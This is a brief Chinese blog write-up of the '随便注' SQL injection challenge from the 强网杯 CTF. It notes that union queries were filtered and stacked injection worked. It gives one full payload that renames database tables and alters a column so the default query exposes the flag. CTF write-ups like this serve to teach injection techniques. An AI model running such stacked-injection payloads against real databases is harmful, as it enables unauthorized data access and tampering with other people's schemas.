强网杯-随便注

强网杯-随便注

 使用#注释+联合查询的时候出了提示

被过滤的不能用,尝试堆叠注入

 可行,继续下去

 1919这一串很可疑,查内容查不出来,再看看words

像最开始的输出结果,猜这是默认查询的表,要把1919那一大串下面的内容通过默认查询显示出来

1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table `words` change `flag` `id` varchar(100);#

重命名之后查询成功

 

 

 

posted @ 2023-08-18 20:09  光头鎏  阅读(64)  评论(0)    收藏  举报